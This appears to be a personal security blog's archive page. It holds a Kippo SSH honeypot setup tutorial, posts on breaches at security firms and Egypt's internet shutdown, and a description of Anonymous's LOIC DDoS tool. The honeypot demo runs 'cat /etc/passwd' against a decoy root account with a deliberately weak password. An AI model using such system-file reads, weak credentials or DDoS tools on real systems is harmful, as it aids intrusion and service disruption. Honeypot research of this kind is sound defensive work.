Kippo medium interactive honeypot

March 3rd, 2011

I spent the last few minutes working on setting up Kippo. Kippo is a medium interactive ssh honeypot. Basically what Kippo does is start up a ssh daemon and then monitor ssh brute force attempts and then if the attacker is successful in gaining access, it logs all of the commands that are run on it, and captures all the tools that are downloaded to it. It was fairly simple to set up on a Ubuntu 10.10 machine so here we go:

First we want to go ahead and take care of a simple dependency


metacortex@ubuntu:~/SecTools/kippo$ sudo aptitude install python-twisted-conch python-twisted-web

Once we have conch installed, go ahead and download kippo and extract it


metacortex@ubuntu:~/SecTools/kippo$ wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz
metacortex@ubuntu:~/SecTools/kippo$ tar -zxvf kippo-0.5.tar.gz
metacortex@ubuntu:~/SecTools/kippo$ cd kippo-0.5

You will now see the following files


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ ls
data dl doc fs.pickle honeyfs kippo kippo.cfg kippo.tac log start.sh txtcmds utils

From here we want to go ahead and edit the config file (kippo.cfg). There are a few special lines you may want to change.


ssh_port = 2222

Please note that you can not run Kippo as root so you are going to want to choose a port number to listen on that does not require root privileges. I would like to have Kippo open on 22 so what I have done is forward port 22 to port 2222 on my firewall.


hostname = sales

This is the hostname that you will see once you successfully log in.


password = 123456

This will be the password for root and will allow access.

Once we get the config all ready we want to go ahead and start kippo. Remember we are not using root


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ ./start.sh
Starting kippo in background…/home/dan/SecTools/kippo/kippo-0.5/kippo/commands/ping.py:6: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import time, re, random, md5
Generating RSA keypair…
done.

You will see the deprecation warning but you can safefully ignore that. Now that we see it generated the SSH keys, we can go ahead and log into it.


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ ssh root@127.0.0.1 -p 2222
The authenticity of host ‘[127.0.0.1]:2222 ([127.0.0.1]:2222)’ can’t be established.
RSA key fingerprint is eb:de:07:eb:8f:e0:e4:c4:1e:1d:d3:eb:02:20:53:f1.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘[127.0.0.1]:2222′ (RSA) to the list of known hosts.
Password:
sales:~# ls
sales:~# pwd
/root
sales:~# id
uid=0(root) gid=0(root) groups=0(root)
sales:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin

Here you can see that we were able to sucessfully log in using the password 123456. Now if we want to go ahead and look at the logs located in the log directory


metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ cd log/
metacortex@ubuntu:~/SecTools/kippo/kippo-0.5$ cat kippo.log
2011-01-31 13:41:34-0800 [-] Log opened.
2011-01-31 13:41:34-0800 [-] twistd 10.1.0 (/usr/bin/python 2.6.6) starting up.
2011-01-31 13:41:34-0800 [-] reactor class: twisted.internet.selectreactor.SelectReactor.
2011-01-31 13:41:34-0800 [-] kippo.core.honeypot.HoneyPotSSHFactory starting on 2222
2011-01-31 13:41:34-0800 [-] Starting factory
2011-01-31 13:44:43-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 127.0.0.1:44261 (127.0.0.1:2222) [session: 0]
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] Remote SSH version: SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] outgoing: aes128-ctr hmac-md5 none
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] incoming: aes128-ctr hmac-md5 none
2011-01-31 13:44:43-0800 [HoneyPotTransport,0,127.0.0.1] connection lost
2011-01-31 13:45:10-0800 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 127.0.0.1:44262 (127.0.0.1:2222) [session: 1]
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] Remote SSH version: SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] outgoing: aes128-ctr hmac-md5 none
2011-01-31 13:45:10-0800 [HoneyPotTransport,1,127.0.0.1] incoming: aes128-ctr hmac-md5 none
2011-01-31 13:45:12-0800 [HoneyPotTransport,1,127.0.0.1] NEW KEYS
2011-01-31 13:45:12-0800 [HoneyPotTransport,1,127.0.0.1] starting service ssh-userauth
2011-01-31 13:45:12-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] root trying auth none
2011-01-31 13:45:12-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] root trying auth keyboard-interactive
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] login attempt [root/123456] succeeded
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] root authenticated with keyboard-interactive
2011-01-31 13:45:15-0800 [SSHService ssh-userauth on HoneyPotTransport,1,127.0.0.1] starting service ssh-connection
2011-01-31 13:45:15-0800 [SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] got channel session request
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] channel open
2011-01-31 13:45:15-0800 [SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] got global no-more-sessions@openssh.com request
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] pty request: xterm (24, 138, 0, 0)
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Terminal size: 24 138
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] unhandled request for env
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] getting shell
2011-01-31 13:45:15-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Opening TTY log: log/tty/20110131-134515-8373.log
2011-01-31 13:45:20-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: ls
2011-01-31 13:45:20-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: ls
2011-01-31 13:45:21-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: pwd
2011-01-31 13:45:21-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: pwd
2011-01-31 13:45:22-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: id
2011-01-31 13:45:22-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: id
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] CMD: cat /etc/passwd
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Command found: cat /etc/passwd
2011-01-31 13:45:33-0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,127.0.0.1] Updating realfile to honeyfs//etc/passwd

Now you have all you need for your honeypot. Go ahead and put it out on the internet and see what you get.

Somone Will Get In

February 14th, 2011

It seems more and more recently, Security companies are getting owned. The three notable ones in the past month or so have been Goatse Security, Ligatt, and HBGary. If you were not aware of who Goatse Security are, then you may remember the breach quite a while ago that exposed the email addresses of iPad owners. That breach was guys from Goatse Security. HBGary is an incident response company and Ligatt Security is a company that has gained more visibility in the Security World than it should.

I will look at the Goatse Security compromise first. A screenshot of the site after getting owned can be seen here. There is not a whole lot behind this other than it was done for the “lolz” and a “look what I did” kind of thing. HBGary and Ligatt are much more interesting.

The entire subject of Ligatt so much material to write about that it constitutes more time than I want to give Ligatt Security and Gregory D Evans. For all of the background on Ligatt/Mr. Evans please see Attrition.org. Now what happened recently was that the website Ligatt Leaks has gone live in an attempt to expose all of the things wrong with Mr. Evans. Some of the fallout from Ligatt Leaks is that someone had gotten into Ligatt’s mail server for several days, pulled down all of the mail and released all of it in a torrent.

HBGary is the most interesting out of the three I have noted. I had never heard of HBGary until one of their higher ups went public stating that he had found all of the personal information of the people that run Anonymous and would be selling it to the FBI. Not only did Anonymous rebuke the information stating that it was not correct but that HBGary was going to turn over innocent people to the FBI. This also angered Anonymous and so they took a page from the Ligatt book, got into HBGary’s mail server and released all of the emails stored there detailing their attack on Anonymous and how HBGary was planning to start targeting WikiLeaks donors.

Being a security shop and getting hacked is a pretty big blow to not only your ego but your reputation as well but it occurs all too often. Some further examples include Dan Kaminsky gets hacked, Kaspersky gets hacked, and Kevin Mitnick’s website hacked.

In my eyes, it comes down to the fact that you don’t write all of the software that you use (personally or for business). If you do not write all of the code yourself then you can not be 100% certain that there are no holes nor can you fully trust it (and even if you do write it 100% yourself, you are human and make mistakes). Being in the Security Industry also requires a sense of humility as there will always be someone who will be able to find a hole. The key is to not piss these people off and if they do find a hole, work with them to try and get it fixed. Do not paint a bullseye on your back and ask for you. Many people have done this and many have failed (see LifeLock CEO and StrongWebmail contest).

Having been keeping tabs on this industry for several years, I can tell you that there are plenty of people that I would not dream of pissing off because I know how good they are at attacking technologies and that I would not stand a chance against them. It just boils down to the fact that you need to assume everything is vulnerable and someone will get in.

.eg gone in the blink of an eye

January 31st, 2011

Over the past week, Egypt has been in an almost state of anarchy due to protesters calling for the resignation of the Egyptian president and government reform. Like most major protests, it has turned into the citizens vs government complete with teargas, riot gear, and car torches. Just like the 2009–2010 Iranian election protests, protesters started turning to the Internet to organize by using sites such as twitter and facebook. These sites were fairly quickly blocked by ISPs.

As the cat and mouse game takes effect, protesters start leveraging tools to get to services that have been blocked and Tor becomes a common tool for communicating across the Internet. The government was not happy about this so what do they do? Well last night, Egyptian ISP’s withdrew 3500 BGP routes. The effect of doing this was to blackhole 88% of all traffic to and from Egypt. Arbor Networks created a very good graph of internet traffic to and from .eg a little bit before and after the routes were removed.



This is very staggering and very scary as the US government has been lobbying to be able to do the exact same thing. There is a current petition online aimed at battling this “kill switch” here. I am very curious about what would happen if the US government ever decided to drop all Internet connectivity. I imagine it would only make whatever civil unrest even more of an issue.

Low Orbital Ion Cannon

December 9th, 2010

Anonymous have mobilized. Well, a subset of Anonymous under the banner of Operation Payback have started attacking organizations that have discontinued services to WikiLeaks (at the time of writing there is no DNS name and it is located at 213.251.145.96). After reading several articles on the subject, I was familiar with the tool that Anonymous was using to attack these sites. From what I can tell there are several versions of the tool named Low Orbital Ion Cannon (or LOIC for short). LOIC is a modified version of an open source load tester. It was modified to connect to an IRC channel and get a list of targets to start attacking.

This is interesting in and of itself as the users are joining an opt-in botnet. I did not have the time to download it and take a look but I did run into a JavaScript version that peaked my interest a bit. I went ahead and grabbed a copy of it and put it up here. It is pretty basic, you put the target url in the first box and launch with “IMMA CHARGING MEH LAZER”. After looking at a packet capture of the traffic it does exactly what you would expect it to, it opens several connections to the server in question. At this point it doesn’t do anything but http and https connections but it would be interesting to see it support other protocols such as SSH and DNS.

Bullshit

November 5th, 2010

One of the things that I see more than anything else during the 8 hours a day that I put in is the mass amount of bullshit. There is so much bullshit, I could swim in it. I have several colleagues that give our customer nothing but bullshit and this is because they don’t know what they are doing and they know it. It surprises me how many people in IT get by on nothing but good old fashioned bullshit. This does not only apply to my colleagues but my customers as well.

There are several reasons that I see as to why bullshit is so rampant but by far, it is the lack of training. There are more time that I can count where a customer is trying to rollout a new core router/firewall into their network but do not know the first thing on how to configure it. I normally come in at the point where they are pissed off because its not a plug and play solution. You’d be surprised how many large corporations I see this from. I don’t know why this is not completely obvious but if you need your network to function as a business, you should make sure your employees that are in charge of the network know what they are doing.

This is why I have been a huge proponent of training for a long time and is part of the reason why I will jump at every opportunity for that little additional training or anything where I can learn something. I never want to catch myself in the position where I am helpless because of my my own ignorance and have to rely on someone else to do it all for me.

 
     
); ?http://www.statcounter.com/free_hit_counter.html